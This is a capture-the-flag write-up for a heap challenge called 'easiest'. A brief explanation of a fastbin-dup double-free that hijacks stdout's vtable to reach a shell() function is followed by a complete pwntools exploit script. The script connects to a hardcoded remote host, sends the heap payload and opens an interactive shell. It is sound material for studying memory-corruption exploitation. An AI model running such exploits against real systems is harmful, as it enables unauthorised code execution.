Tags: easiest 



We use `fastbin dup` and `double free` to make `malloc` return a chunk at an arbitrary address in the `GOT` area. However, `fastbin dup` requires the fake chunk's size field to pass the size check before the chunk is handed out. I found a usable address at `0x60207a`. Because that address is higher than the `GOT`, we cannot use it to overwrite the `GOT`. So instead we overwrite `stdout` to point it at a fake `vtable` that jumps into `shell()`.

```
#!/usr/bin/env python

from pwn import *

__DEBUG__ = False
__BIN__ = "./easiest"
# Loading the ELF here only has pwntools' side effects (logging); the object is not kept.
ELF(__BIN__)
__LIBC__ = ""

__HOST__ = "39.96.9.148"
__PORT__ = 9999

# Prompt once at start-up: a non-zero answer runs the local binary,
# zero connects to the remote service.
__DEBUG__ = int(raw_input("> "))
io = process(__BIN__) if __DEBUG__ else remote(__HOST__, __PORT__)

def add(idx, leng, data):
    """Drive menu option 1 on the global `io` tube: allocate slot `idx`.

    Each prompt is awaited with recvuntil() and answered with sendline(),
    in the same order the program asks: menu choice, index, length, content.
    `idx` and `leng` are sent as decimal strings; `data` is sent verbatim.
    """
    dialogue = (
        ("lete ", "1"),
        ("(0-11):", str(idx)),
        ("Length:", str(leng)),
        ("C:", data),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)

def delete(idx):
    """Drive menu option 2 on the global `io` tube: free slot `idx`.

    Waits for the menu prompt, picks option 2, then answers the index
    prompt with `idx` rendered as a decimal string.
    """
    dialogue = (
        ("lete ", "2"),
        ("(0-11):", str(idx)),
    )
    for prompt, answer in dialogue:
        io.recvuntil(prompt)
        io.sendline(answer)

# Addresses taken from the binary (see the writeup text above): the target
# function, the fake-chunk address whose size field passes the fastbin check,
# and the pointer that is later overwritten.
shell = 0x400946
fake_chunk = 0x60207a
ptr = 0x6020c0

# Slot 11 is filled with repeated copies of the shell address; the writeup
# describes this as the fake vtable — TODO confirm against the binary.
add(11, 0x40, p64(shell)*8)
add(10, 0x38, p64(0xdeadbeef))
add(9, 0x30, p64(0xdeadbeef))
# Free 10, 9, 10: the double free the writeup relies on (fastbin dup).
delete(10)
delete(9)
delete(10)
# First re-allocation writes fake_chunk as the freed chunk's forward pointer.
add(1, 0x30, p64(fake_chunk))
add(1, 0x30, p64(0)) #check
# Payload written through the fake chunk; the 216/88 offsets are not
# explained on the page — TODO confirm against the target's stdout layout.
p = "\x00"*6
p += "\x00"*0x10 #padding
p += p64(ptr-216+88)
# p += p64(shell)

add(9, 0x30, p64(fake_chunk))

if __DEBUG__:
    gdb.attach(io)

# This allocation lands on fake_chunk and writes the payload.
add(10, 0x38, p)
# Extra input line sent after the last add; its purpose is not shown on the page.
io.sendline("h4niz")

io.sendline("whoami")

io.interactive()
```